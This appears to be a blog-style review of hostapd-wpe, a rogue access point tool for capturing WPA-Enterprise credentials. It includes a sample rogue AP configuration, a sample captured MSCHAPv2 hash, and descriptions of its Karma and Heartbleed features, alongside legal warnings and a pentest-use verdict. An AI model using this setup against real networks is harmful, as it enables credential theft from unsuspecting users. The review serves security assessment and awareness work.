Hostapd-WPE: How Rogue Access Points Harvest Enterprise WiFi Credentials
Hook
Every time a smartphone automatically connects to a familiar WiFi network name, it's potentially broadcasting its enterprise credentials to anyone listening. Hostapd-WPE weaponizes this trust.
Context
WPA-Enterprise networks, ubiquitous in corporate environments, universities, and government facilities, rely on 802.1X authentication to verify users before granting network access. Unlike WPA-PSK (pre-shared key) networks where everyone shares the same password, WPA-Enterprise uses individual credentials—typically a username and password—validated through the Extensible Authentication Protocol (EAP). The security model assumes clients will validate the authentication server's certificate, preventing man-in-the-middle attacks. In practice, most devices ship with minimal certificate validation enabled, and users habitually click through security warnings.
Hostapd-WPE emerged from this security gap. Built by Brad Antoniewicz at Open Security Research as a patch against the standard hostapd daemon (the de facto Linux software for creating WiFi access points), it transforms a legitimate AP tool into a credential harvesting platform. The "WPE" suffix stands for "Wireless Pwnage Edition," reflecting its offensive security purpose. By impersonating both the access point and the RADIUS authentication server, hostapd-wpe sits in the middle of the EAP handshake, capturing authentication challenges and responses that can be cracked offline. This tool exposed a fundamental weakness: when clients don't properly validate server certificates, the entire 802.1X security model collapses into a credential theft opportunity.
Technical Insight
The architecture of hostapd-wpe centers on intercepting EAP authentication flows at the most vulnerable point: the inner authentication tunnel. WPA-Enterprise typically uses tunneled EAP methods like PEAP (Protected EAP) or EAP-TTLS (EAP Tunneled Transport Layer Security). These protocols establish an outer TLS tunnel, then perform authentication inside that tunnel using inner methods like MSCHAPv2. The outer tunnel should protect credentials from eavesdropping, but only if the client validates the server's certificate. Hostapd-WPE exploits certificate validation failures by presenting a self-signed certificate and capturing whatever credentials the trusting client sends.
The core modification to hostapd occurs in the EAP server implementation. The patched code intercepts EAP-MSCHAP-V2 challenge-response exchanges and writes them to disk in formats optimized for password cracking. When a client connects, hostapd-wpe completes the TLS handshake with its rogue certificate, then the client proceeds to authenticate. Here's what a typical configuration file looks like:
interface=wlan0
driver=nl80211
ssid=CorpNetwork
channel=6
hw_mode=g
# WPA-Enterprise configuration
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
# Integrated RADIUS server
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
# Credential logging
wpe_logfile=/var/log/hostapd-wpe.log
The eap_user_file contains wildcard entries that accept any username, effectively telling hostapd to authenticate everyone regardless of credentials. This keeps clients connected and prevents suspicion. The EAP server module, instead of rejecting invalid credentials, logs the challenge-response pairs and returns EAP-Success.
The captured credentials appear in formats ready for cracking tools. For MSCHAPv2, hostapd-wpe logs both the challenge and response in formats compatible with asleap and John the Ripper:
mschapv2: Wed Apr 15 14:32:18 2016
username: jdoe
challenge: 8a:c3:77:92:b5:4e:1d:9f
response: 4f:7a:8e:6c:9b:2d:3e:5a:1c:8d:7e:9f:0a:3b:6c:4d:5e:8f:9a:0b:1c:2d:3e:4f
john output:
jdoe:$NETNTLM$8ac37792b54e1d9f$4f7a8e6c9b2d3e5a1c8d7e9f0a3b6c4d5e8f9a0b1c2d3e4f
This hash can be cracked offline using GPU-accelerated tools. Since MSCHAPv2 uses DES-based encryption with known weaknesses, cracking success rates are high for non-complex passwords. The attack's beauty lies in its passivity after initial setup—hostapd-wpe simply waits for clients to connect, requiring no active exploitation.
The tool also implements Karma attack functionality, responding to probe requests from clients searching for known networks. When a device walks around broadcasting "Have you seen my network 'CorpNetwork'?" hostapd-wpe can respond "Yes, I am CorpNetwork!" regardless of its configured SSID. This dramatically increases the attack surface by capturing opportunistic connections from devices with saved network profiles.
The Heartbleed integration is particularly devious. For clients vulnerable to CVE-2014-0160, hostapd-wpe can exploit the OpenSSL memory leak during the TLS handshake, potentially extracting credentials or session keys directly from client memory before authentication even occurs. While Heartbleed is largely patched in 2024, legacy devices and embedded systems remain vulnerable.
Gotcha
The most critical limitation is obsolescence. Hostapd-WPE is based on hostapd-2.6, released in 2016. Eight years in security tool development is an eternity. Modern Linux wireless drivers, kernel updates, and EAP implementations may behave unexpectedly with this aging codebase. Compilation often requires hunting down specific library versions, and wireless hardware support is hit-or-miss with contemporary chipsets. More concerning, newer EAP methods and security enhancements in enterprise authentication servers may not be vulnerable to the same interception techniques. Organizations running updated certificate validation policies, certificate pinning, or newer EAP variants like EAP-PWD or EAP-TLS (certificate-based, no password to harvest) will resist hostapd-wpe attacks.
The legal and ethical constraints cannot be overstated. Using hostapd-wpe without explicit written authorization is a federal crime in most jurisdictions, constituting wire fraud, computer intrusion, and identity theft. Even in authorized penetration tests, the scope must be precisely defined. Creating a rogue access point in a dense office building might inadvertently capture credentials from neighboring organizations, expanding your attack beyond the authorized scope and creating massive liability. The tool generates evidence of credential compromise that must be handled with extreme care—log files containing usernames and password hashes are sensitive security data requiring encryption at rest and strict access controls. Physical proximity requirements also limit applicability; you need to be within wireless range of target clients, which may require physical presence in secured facilities.
Verdict
Use if: You're conducting authorized wireless penetration tests against WPA-Enterprise networks and need to assess client certificate validation behavior, credential security, and susceptibility to rogue AP attacks. It's valuable for red team engagements specifically testing 802.1X implementations in environments where you have explicit written permission and controlled scope. Also useful for security awareness training—demonstrating a live credential harvest drives home the importance of certificate validation in ways theoretical discussions never will. Skip if: You need a maintained, modern solution (eaphammer is the spiritual successor with active development), aren't performing authorized security assessments with proper legal coverage, or need to test against contemporary EAP implementations and security controls. Also skip if you lack experience with wireless security fundamentals—this tool's effectiveness depends on understanding EAP protocols, certificate validation, and wireless networking at a deep level. The combination of age, legal risk, and specialization makes hostapd-wpe a narrow-purpose tool for experienced security professionals only.
